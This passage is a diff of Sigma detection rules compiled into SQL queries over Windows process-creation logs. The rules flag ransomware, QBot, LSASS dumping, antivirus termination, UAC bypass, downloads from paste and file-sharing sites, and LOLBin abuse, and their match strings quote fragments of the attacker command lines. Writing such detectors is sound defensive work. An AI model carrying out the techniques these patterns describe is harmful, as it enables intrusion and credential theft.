LAUNCHER", + "author": "Timur Zinniatullin, oscd.community", "tags": [ - "attack.initial_access", - "attack.t1133" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ParentProcessName LIKE '%\\\\dns.exe' ESCAPE '\\' AND NOT (NewProcessName LIKE '%\\\\conhost.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%&&set%' ESCAPE '\\' AND CommandLine LIKE '%cmd%' ESCAPE '\\' AND CommandLine LIKE '%/c%' ESCAPE '\\' AND CommandLine LIKE '%-f%' ESCAPE '\\' AND (CommandLine LIKE '%{0}%' ESCAPE '\\' OR CommandLine LIKE '%{1}%' ESCAPE '\\' OR CommandLine LIKE '%{2}%' ESCAPE '\\' OR CommandLine LIKE '%{3}%' ESCAPE '\\' OR CommandLine LIKE '%{4}%' ESCAPE '\\' OR CommandLine LIKE '%{5}%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_dns_susp_child_process.yml" + "filename": "proc_creation_win_hktl_invoke_obfuscation_via_var.yml" }, { - "title": "Potential BlackByte Ransomware Activity", - "id": "999e8307-a775-4d5f-addc-4855632335be", + "title": "Regsvr32 Command Line Without DLL", + "id": "50919691-7302-437f-8e10-1fe088afa145", "status": "test", - "description": "Detects command line patterns used by BlackByte ransomware in different operations", + "description": "Detects a regsvr.exe execution that doesn't contain a DLL in the command line", "author": "Florian Roth (Nextron Systems)", + "tags": [ + "attack.defense_evasion", + "attack.t1574", + "attack.execution" + ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE 'C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' AND CommandLine LIKE '% -single %' ESCAPE '\\') OR (CommandLine LIKE '%del C:\\\\Windows\\\\System32\\\\Taskmgr.exe%' ESCAPE '\\' OR CommandLine LIKE '%;Set-Service -StartupType Disabled $%' ESCAPE '\\' OR CommandLine LIKE '%powershell -command \"$x =[System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String(%' ESCAPE '\\' OR CommandLine LIKE '% do start wordpad.exe /p %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND NOT ((CommandLine LIKE '%.dll%' ESCAPE '\\' OR CommandLine LIKE '%.ocx%' ESCAPE '\\' OR CommandLine LIKE '%.cpl%' ESCAPE '\\' OR CommandLine LIKE '%.ax%' ESCAPE '\\' OR CommandLine LIKE '%.bav%' ESCAPE '\\' OR CommandLine LIKE '%.ppl%' ESCAPE '\\'))) AND NOT (CommandLine = '')) AND NOT (CommandLine = ''))" ], - "filename": "proc_creation_win_malware_blackbyte_ransomware.yml" + "filename": "proc_creation_win_regsvr32_no_dll.yml" }, { - "title": "Potential Suspicious Windows Feature Enabled - ProcCreation", - "id": "c740d4cf-a1e9-41de-bb16-8a46a4f57918", + "title": "Write Protect For Storage Disabled", + "id": "75f7a0e2-7154-4c4d-9eae-5cdb4e0a5c13", "status": "experimental", - "description": "Detects usage of the built-in PowerShell cmdlet \"Enable-WindowsOptionalFeature\" used as a Deployment Image Servicing and Management tool.\nSimilar to DISM.exe, this cmdlet is used to enumerate, install, uninstall, configure, and update features and packages in Windows images\n", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Looks for changes to registry to disable any write-protect property for storage devices. This could be a precursor to a ransomware attack and has been an observed technique used by cypherpunk group.", + "author": "Sreeman", "tags": [ - "attack.defense_evasion" + "attack.defense_evasion", + "attack.t1562" ], "falsepositives": [ - "Legitimate usage of the features listed in the rule." + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%Enable-WindowsOptionalFeature%' ESCAPE '\\' AND CommandLine LIKE '%-Online%' ESCAPE '\\' AND CommandLine LIKE '%-FeatureName%' ESCAPE '\\' AND (CommandLine LIKE '%TelnetServer%' ESCAPE '\\' OR CommandLine LIKE '%Internet-Explorer-Optional-amd64%' ESCAPE '\\' OR CommandLine LIKE '%TFTP%' ESCAPE '\\' OR CommandLine LIKE '%SMB1Protocol%' ESCAPE '\\' OR CommandLine LIKE '%Client-ProjFS%' ESCAPE '\\' OR CommandLine LIKE '%Microsoft-Windows-Subsystem-Linux%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%reg add%' ESCAPE '\\' AND CommandLine LIKE '%\\\\system\\\\currentcontrolset\\\\control%' ESCAPE '\\' AND CommandLine LIKE '%write protection%' ESCAPE '\\' AND CommandLine LIKE '%0%' ESCAPE '\\' AND (CommandLine LIKE '%storage%' ESCAPE '\\' OR CommandLine LIKE '%storagedevicepolicies%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_powershell_enable_susp_windows_optional_feature.yml" + "filename": "proc_creation_win_reg_write_protect_for_storage_disabled.yml" }, { - "title": "Suspicious WindowsTerminal Child Processes", - "id": "8de89e52-f6e1-4b5b-afd1-41ecfa300d48", - "status": "experimental", - "description": "Detects suspicious children spawned via the Windows Terminal application which could be a sign of persistence via WindowsTerminal (see references section)", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Application Whitelisting Bypass via Dxcap.exe", + "id": "60f16a96-db70-42eb-8f76-16763e333590", + "status": "test", + "description": "Detects execution of of Dxcap.exe", + "author": "Beyu Denis, oscd.community, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.persistence" + "attack.defense_evasion", + "attack.t1218" ], "falsepositives": [ - "Other legitimate \"Windows Terminal\" profiles" + "Legitimate execution of dxcap.exe by legitimate user" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((ParentProcessName LIKE '%\\\\WindowsTerminal.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\wt.exe' ESCAPE '\\') AND ((NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\csc.exe' ESCAPE '\\') OR (NewProcessName LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\TEMP\\\\%' ESCAPE '\\') OR (CommandLine LIKE '% iex %' ESCAPE '\\' OR CommandLine LIKE '% icm%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-%' ESCAPE '\\' OR CommandLine LIKE '%Import-Module %' ESCAPE '\\' OR CommandLine LIKE '%ipmo %' ESCAPE '\\' OR CommandLine LIKE '%DownloadString(%' ESCAPE '\\' OR CommandLine LIKE '% /c %' ESCAPE '\\' OR CommandLine LIKE '% /k %' ESCAPE '\\' OR CommandLine LIKE '% /r %' ESCAPE '\\'))) AND NOT ((CommandLine LIKE '%Import-Module%' ESCAPE '\\' AND CommandLine LIKE '%Microsoft.VisualStudio.DevShell.dll%' ESCAPE '\\' AND CommandLine LIKE '%Enter-VsDevShell%' ESCAPE '\\') OR (CommandLine LIKE '%\\\\AppData\\\\Local\\\\Packages\\\\Microsoft.WindowsTerminal\\_%' ESCAPE '\\' AND CommandLine LIKE '%\\\\LocalState\\\\settings.json%' ESCAPE '\\') OR (CommandLine LIKE '%C:\\\\Program Files\\\\Microsoft Visual Studio\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\Common7\\\\Tools\\\\VsDevCmd.bat%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\DXCap.exe' ESCAPE '\\' OR OriginalFileName = 'DXCap.exe') AND CommandLine LIKE '% -c %' ESCAPE '\\')" ], - "filename": "proc_creation_win_windows_terminal_susp_children.yml" + "filename": "proc_creation_win_lolbin_susp_dxcap.yml" }, { - "title": "Suspicious HWP Sub Processes", - "id": "023394c4-29d5-46ab-92b8-6a534c6f447b", + "title": "Base64 Encoded PowerShell Command Detected", + "id": "e32d4572-9826-4738-b651-95fa63747e8a", "status": "test", - "description": "Detects suspicious Hangul Word Processor (Hanword) sub processes that could indicate an exploitation", + "description": "Detects usage of the \"FromBase64String\" function in the commandline which is used to decode a base64 encoded string", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.initial_access", - "attack.t1566.001", - "attack.execution", - "attack.t1203", - "attack.t1059.003", - "attack.g0032" + "attack.t1027", + "attack.defense_evasion", + "attack.t1140", + "attack.t1059.001" ], "falsepositives": [ - "Unknown" + "Administrative script libraries" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\Hwp.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\gbb.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%::FromBase64String(%' ESCAPE '\\')" ], - "filename": "proc_creation_win_hwp_exploits.yml" + "filename": "proc_creation_win_powershell_frombase64string.yml" }, { - "title": "Scheduled Task Executing Powershell Encoded Payload from Registry", - "id": "c4eeeeae-89f4-43a7-8b48-8d1bdfa66c78", + "title": "Bypass UAC via CMSTP", + "id": "e66779cc-383e-4224-a3a4-267eeb585c40", "status": "test", - "description": "Detects the creation of a schtask that executes a base64 encoded payload stored in the Windows Registry using PowerShell.", - "author": "pH-T (Nextron Systems), @Kostastsale, @TheDFIRReport", + "description": "Detect commandline usage of Microsoft Connection Manager Profile Installer (cmstp.exe) to install specially formatted local .INF files", + "author": "E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community", "tags": [ - "attack.execution", - "attack.persistence", - "attack.t1053.005", - "attack.t1059.001" + "attack.privilege_escalation", + "attack.defense_evasion", + "attack.t1548.002", + "attack.t1218.003" ], "falsepositives": [ - "Unlikely" + "Legitimate use of cmstp.exe utility by legitimate user" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR OriginalFileName = 'schtasks.exe') AND (CommandLine LIKE '%/Create%' ESCAPE '\\' AND CommandLine LIKE '%FromBase64String%' ESCAPE '\\' AND CommandLine LIKE '%Get-ItemProperty%' ESCAPE '\\' AND (CommandLine LIKE '%HKCU:%' ESCAPE '\\' OR CommandLine LIKE '%HKLM:%' ESCAPE '\\' OR CommandLine LIKE '%registry::%' ESCAPE '\\' OR CommandLine LIKE '%HKEY\\_%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\cmstp.exe' ESCAPE '\\' OR OriginalFileName = 'CMSTP.EXE') AND (CommandLine LIKE '%/s%' ESCAPE '\\' OR CommandLine LIKE '%-s%' ESCAPE '\\' OR CommandLine LIKE '%/au%' ESCAPE '\\' OR CommandLine LIKE '%-au%' ESCAPE '\\' OR CommandLine LIKE '%/ni%' ESCAPE '\\' OR CommandLine LIKE '%-ni%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_schtasks_reg_loader.yml" + "filename": "proc_creation_win_uac_bypass_cmstp.yml" }, { - "title": "HackTool - PCHunter Execution", - "id": "fca949cc-79ca-446e-8064-01aa7e52ece5", - "status": "experimental", - "description": "Detects suspicious use of PCHunter, a tool like Process Hacker to view and manipulate processes, kernel options and other low level stuff", - "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali", + "title": "Potential QBot Activity", + "id": "4fcac6eb-0287-4090-8eea-2602e4c20040", + "status": "stable", + "description": "Detects potential QBot activity by looking for process executions used previously by QBot", + "author": "Florian Roth (Nextron Systems)", + "tags": [ + "attack.execution", + "attack.t1059.005" + ], "falsepositives": [ "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\PCHunter64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\PCHunter32.exe' ESCAPE '\\') OR OriginalFileName = 'PCHunter.exe' OR Description = 'Epoolsoft Windows Information View Tools' OR (Hashes LIKE '%SHA1=5F1CBC3D99558307BC1250D084FA968521482025%' ESCAPE '\\' OR Hashes LIKE '%MD5=987B65CD9B9F4E9A1AFD8F8B48CF64A7%' ESCAPE '\\' OR Hashes LIKE '%SHA256=2B214BDDAAB130C274DE6204AF6DBA5AEEC7433DA99AA950022FA306421A6D32%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=444D210CEA1FF8112F256A4997EED7FF%' ESCAPE '\\' OR Hashes LIKE '%SHA1=3FB89787CB97D902780DA080545584D97FB1C2EB%' ESCAPE '\\' OR Hashes LIKE '%MD5=228DD0C2E6287547E26FFBD973A40F14%' ESCAPE '\\' OR Hashes LIKE '%SHA256=55F041BF4E78E9BFA6D4EE68BE40E496CE3A1353E1CA4306598589E19802522C%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0479F44DF47CFA2EF1CCC4416A538663%' ESCAPE '\\') OR md5 IN ('228dd0c2e6287547e26ffbd973a40f14', '987b65cd9b9f4e9a1afd8f8b48cf64a7') OR sha1 IN ('5f1cbc3d99558307bc1250d084fa968521482025', '3fb89787cb97d902780da080545584d97fb1c2eb') OR sha256 IN ('2b214bddaab130c274de6204af6dba5aeec7433da99aa950022fa306421a6d32', '55f041bf4e78e9bfa6d4ee68be40e496ce3a1353e1ca4306598589e19802522c') OR Imphash IN ('444d210cea1ff8112f256a4997eed7ff', '0479f44df47cfa2ef1ccc4416a538663')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((ParentProcessName LIKE '%\\\\WinRAR.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\') OR CommandLine LIKE '% /c ping.exe -n 6 127.0.0.1 & type %' ESCAPE '\\' OR (CommandLine LIKE '%regsvr32.exe%' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\ProgramData%' ESCAPE '\\' AND CommandLine LIKE '%.tmp%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_hktl_pchunter.yml" + "filename": "proc_creation_win_malware_qbot.yml" }, { - "title": "Taskkill Symantec Endpoint Protection", - "id": "4a6713f6-3331-11ed-a261-0242ac120002", - "status": "experimental", - "description": "Detects one of the possible scenarios for disabling Symantec Endpoint Protection.\nSymantec Endpoint Protection antivirus software services incorrectly implement the protected service mechanism.\nAs a result, the NT AUTHORITY/SYSTEM user can execute the taskkill /im command several times ccSvcHst.exe /f, thereby killing the process belonging to the service, and thus shutting down the service.\n", - "author": "Ilya Krestinichev, Florian Roth (Nextron Systems)", + "title": "Terminal Service Process Spawn", + "id": "1012f107-b8f1-4271-af30-5aed2de89b39", + "status": "test", + "description": "Detects a process spawned by the terminal service server process (this could be an indicator for an exploitation of CVE-2019-0708)", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1562.001" + "attack.initial_access", + "attack.t1190", + "attack.lateral_movement", + "attack.t1210", + "car.2013-07-002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%taskkill%' ESCAPE '\\' AND CommandLine LIKE '% /F %' ESCAPE '\\' AND CommandLine LIKE '% /IM %' ESCAPE '\\' AND CommandLine LIKE '%ccSvcHst.exe%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentCommandLine LIKE '%\\\\svchost.exe%' ESCAPE '\\' AND ParentCommandLine LIKE '%termsvcs%' ESCAPE '\\') AND NOT (((NewProcessName LIKE '%\\\\rdpclip.exe' ESCAPE '\\' OR NewProcessName LIKE '%:\\\\Windows\\\\System32\\\\csrss.exe' ESCAPE '\\' OR NewProcessName LIKE '%:\\\\Windows\\\\System32\\\\wininit.exe' ESCAPE '\\' OR NewProcessName LIKE '%:\\\\Windows\\\\System32\\\\winlogon.exe' ESCAPE '\\')) OR (NewProcessName = '')))" ], - "filename": "proc_creation_win_taskkill_sep.yml" + "filename": "proc_creation_win_svchost_termserv_proc_spawn.yml" }, { - "title": "Suspicious Download From File-Sharing Website Via Bitsadmin", - "id": "8518ed3d-f7c9-4601-a26c-f361a4256a0c", + "title": "Use NTFS Short Name in Image", + "id": "3ef5605c-9eb9-47b0-9a71-b727e6aa5c3b", "status": "experimental", - "description": "Detects usage of bitsadmin downloading a file from a suspicious domain", - "author": "Florian Roth (Nextron Systems)", + "description": "Detect use of the Windows 8.3 short name. Which could be used as a method to avoid Image based detection", + "author": "frack113, Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.persistence", - "attack.t1197", - "attack.s0190", - "attack.t1036.003" + "attack.t1564.004" ], "falsepositives": [ - "Some legitimate apps use this, but limited." + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR OriginalFileName = 'bitsadmin.exe') AND (CommandLine LIKE '% /transfer %' ESCAPE '\\' OR CommandLine LIKE '% /create %' ESCAPE '\\' OR CommandLine LIKE '% /addfile %' ESCAPE '\\') AND (CommandLine LIKE '%.ghostbin.co/%' ESCAPE '\\' OR CommandLine LIKE '%.hastebin.com%' ESCAPE '\\' OR CommandLine LIKE '%.paste.ee%' ESCAPE '\\' OR CommandLine LIKE '%anonfiles.com%' ESCAPE '\\' OR CommandLine LIKE '%cdn.discordapp.com/attachments/%' ESCAPE '\\' OR CommandLine LIKE '%ddns.net%' ESCAPE '\\' OR CommandLine LIKE '%gist.githubusercontent.com%' ESCAPE '\\' OR CommandLine LIKE '%mediafire.com%' ESCAPE '\\' OR CommandLine LIKE '%mega.nz%' ESCAPE '\\' OR CommandLine LIKE '%paste.ee%' ESCAPE '\\' OR CommandLine LIKE '%pastebin.com%' ESCAPE '\\' OR CommandLine LIKE '%pastebin.pl%' ESCAPE '\\' OR CommandLine LIKE '%pastetext.net%' ESCAPE '\\' OR CommandLine LIKE '%privatlab.com%' ESCAPE '\\' OR CommandLine LIKE '%privatlab.net%' ESCAPE '\\' OR CommandLine LIKE '%raw.githubusercontent.com%' ESCAPE '\\' OR CommandLine LIKE '%send.exploit.in%' ESCAPE '\\' OR CommandLine LIKE '%sendspace.com%' ESCAPE '\\' OR CommandLine LIKE '%storage.googleapis.com%' ESCAPE '\\' OR CommandLine LIKE '%transfer.sh%' ESCAPE '\\' OR CommandLine LIKE '%ufile.io%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%~1.exe%' ESCAPE '\\' OR NewProcessName LIKE '%~1.bat%' ESCAPE '\\' OR NewProcessName LIKE '%~1.msi%' ESCAPE '\\' OR NewProcessName LIKE '%~1.vbe%' ESCAPE '\\' OR NewProcessName LIKE '%~1.vbs%' ESCAPE '\\' OR NewProcessName LIKE '%~1.dll%' ESCAPE '\\' OR NewProcessName LIKE '%~1.ps1%' ESCAPE '\\' OR NewProcessName LIKE '%~1.js%' ESCAPE '\\' OR NewProcessName LIKE '%~1.hta%' ESCAPE '\\' OR NewProcessName LIKE '%~2.exe%' ESCAPE '\\' OR NewProcessName LIKE '%~2.bat%' ESCAPE '\\' OR NewProcessName LIKE '%~2.msi%' ESCAPE '\\' OR NewProcessName LIKE '%~2.vbe%' ESCAPE '\\' OR NewProcessName LIKE '%~2.vbs%' ESCAPE '\\' OR NewProcessName LIKE '%~2.dll%' ESCAPE '\\' OR NewProcessName LIKE '%~2.ps1%' ESCAPE '\\' OR NewProcessName LIKE '%~2.js%' ESCAPE '\\' OR NewProcessName LIKE '%~2.hta%' ESCAPE '\\') AND NOT ((ParentProcessName LIKE '%\\\\WebEx\\\\WebexHost.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\thor\\\\thor64.exe' ESCAPE '\\' OR ParentProcessName LIKE '%-installer.exe' ESCAPE '\\') OR NewProcessName LIKE '%\\\\vcredi%' ESCAPE '\\' OR ParentProcessName LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_bitsadmin_download_file_sharing_domains.yml" + "filename": "proc_creation_win_susp_ntfs_short_name_use_image.yml" }, { - "title": "Abused Debug Privilege by Arbitrary Parent Processes", - "id": "d522eca2-2973-4391-a3e0-ef0374321dae", + "title": "Suspicious UltraVNC Execution", + "id": "871b9555-69ca-4993-99d3-35a59f9f3599", "status": "test", - "description": "Detection of unusual child processes by different system processes", - "author": "Semanur Guneysu @semanurtg, oscd.community", + "description": "Detects suspicious UltraVNC command line flag combination that indicate a auto reconnect upon execution, e.g. startup (as seen being used by Gamaredon threat group)", + "author": "Bhabesh Raj", "tags": [ - "attack.privilege_escalation", - "attack.t1548" + "attack.lateral_movement", + "attack.g0047", + "attack.t1021.005" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((ParentProcessName LIKE '%\\\\winlogon.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\services.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\lsass.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\csrss.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\smss.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\wininit.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\spoolsv.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\searchindexer.exe' ESCAPE '\\') AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\')) AND ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll', 'Cmd.Exe'))) AND NOT (CommandLine LIKE '% route %' ESCAPE '\\' AND CommandLine LIKE '% ADD %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%-autoreconnect %' ESCAPE '\\' AND CommandLine LIKE '%-connect %' ESCAPE '\\' AND CommandLine LIKE '%-id:%' ESCAPE '\\')" ], - "filename": "proc_creation_win_susp_abusing_debug_privilege.yml" + "filename": "proc_creation_win_ultravnc_susp_execution.yml" }, { - "title": "HackTool - HandleKatz LSASS Dumper Execution", - "id": "ca621ba5-54ab-4035-9942-d378e6fcde3c", + "title": "HackTool - Htran/NATBypass Execution", + "id": "f5e3b62f-e577-4e59-931e-0a15b2b94e1e", "status": "experimental", - "description": "Detects the use of HandleKatz, a tool that demonstrates the usage of cloned handles to Lsass in order to create an obfuscated memory dump of the same", + "description": "Detects exeuctable names or flags used by Htran or Htran-like tools (e.g. NATBypass)", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.command_and_control", + "attack.t1090", + "attack.s0040" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\loader.exe' ESCAPE '\\' AND CommandLine LIKE '%--pid:%' ESCAPE '\\') OR (Imphash IN ('38d9e015591bbfd4929e0d0f47fa0055', '0e2216679ca6e1094d63322e3412d650') OR Hashes IN ('IMPHASH=38D9E015591BBFD4929E0D0F47FA0055', 'IMPHASH=0E2216679CA6E1094D63322E3412D650')) OR (CommandLine LIKE '%--pid:%' ESCAPE '\\' AND CommandLine LIKE '%--outfile:%' ESCAPE '\\' AND (CommandLine LIKE '%.dmp%' ESCAPE '\\' OR CommandLine LIKE '%lsass%' ESCAPE '\\' OR CommandLine LIKE '%.obf%' ESCAPE '\\' OR CommandLine LIKE '%dump%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\htran.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\lcx.exe' ESCAPE '\\') OR (CommandLine LIKE '%.exe -tran %' ESCAPE '\\' OR CommandLine LIKE '%.exe -slave %' ESCAPE '\\')))" ], - "filename": "proc_creation_win_hktl_handlekatz.yml" + "filename": "proc_creation_win_hktl_htran_or_natbypass.yml" }, { - "title": "Privilege Escalation via Named Pipe Impersonation", - "id": "9bd04a79-dabe-4f1f-a5ff-92430265c96b", - "status": "experimental", - "description": "Detects a remote file copy attempt to a hidden network share. This may indicate lateral movement or data staging activity.", - "author": "Tim Rauch", + "title": "Using SettingSyncHost.exe as LOLBin", + "id": "b2ddd389-f676-4ac4-845a-e00781a48e5f", + "status": "test", + "description": "Detects using SettingSyncHost.exe to run hijacked binary", + "author": "Anton Kutepov, oscd.community", "tags": [ - "attack.lateral_movement", - "attack.t1021" + "attack.execution", + "attack.defense_evasion", + "attack.t1574.008" ], "falsepositives": [ - "Other programs that cause these patterns (please report)" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\') OR OriginalFileName IN ('Cmd.Exe', 'PowerShell.EXE')) AND (CommandLine LIKE '%echo%' ESCAPE '\\' AND CommandLine LIKE '%>%' ESCAPE '\\' AND CommandLine LIKE '%\\\\\\\\.\\\\pipe\\\\\\*' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\')) AND (ParentCommandLine LIKE '%cmd.exe /c%' ESCAPE '\\' AND ParentCommandLine LIKE '%RoamDiag.cmd%' ESCAPE '\\' AND ParentCommandLine LIKE '%-outputpath%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_priv_escalation_via_named_pipe.yml" + "filename": "proc_creation_win_lolbin_settingsynchost.yml" }, { - "title": "Potential Arbitrary Command Execution Using Msdt.EXE", - "id": "258fc8ce-8352-443a-9120-8a11e4857fa5", + "title": "Suspicious CMD Shell Output Redirect", + "id": "8e0bb260-d4b2-4fff-bb8d-3f82118e6892", "status": "experimental", - "description": "Detects processes leveraging the \"ms-msdt\" handler or the \"msdt.exe\" binary to execute arbitrary commands as seen in the follina (CVE-2022-30190) vulnerability", + "description": "Detects inline windows shell commands redirecting output via the \">\" symbol to a suspicious location", "author": "Nasreddine Bencherchali (Nextron Systems)", + "tags": [ + "attack.execution", + "attack.t1218" + ], + "falsepositives": [ + "Legitimate admin scripts" + ], + "level": "medium", + "rule": [ + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR OriginalFileName = 'Cmd.Exe') AND ((CommandLine LIKE '%> \\%USERPROFILE\\%\\\\%' ESCAPE '\\' OR CommandLine LIKE '%> \\%APPDATA\\%\\\\%' ESCAPE '\\' OR CommandLine LIKE '%> \\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%> C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%> \\%TEMP\\%\\\\%' ESCAPE '\\' OR CommandLine LIKE '%> \\%TMP\\%\\\\%' ESCAPE '\\' OR CommandLine LIKE '%> C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%> C:\\\\Temp\\\\%' ESCAPE '\\') OR ((CommandLine LIKE '% > %' ESCAPE '\\' OR CommandLine LIKE '% >> %' ESCAPE '\\') AND CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\')))" + ], + "filename": "proc_creation_win_cmd_redirection_susp_folder.yml" + }, + { + "title": "CL_LoadAssembly.ps1 Proxy Execution", + "id": "c57872c7-614f-4d7f-a40d-b78c8df2d30d", + "status": "experimental", + "description": "Detects the use of a Microsoft signed script to execute commands and bypassing AppLocker.", + "author": "frack113", "tags": [ "attack.defense_evasion", - "attack.t1202" + "attack.t1216" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\msdt.exe' ESCAPE '\\' OR OriginalFileName = 'msdt.exe') AND (CommandLine LIKE '%IT\\_BrowseForFile=%' ESCAPE '\\' OR (CommandLine LIKE '% PCWDiagnostic%' ESCAPE '\\' AND (CommandLine LIKE '% /af %' ESCAPE '\\' OR CommandLine LIKE '% -af %' ESCAPE 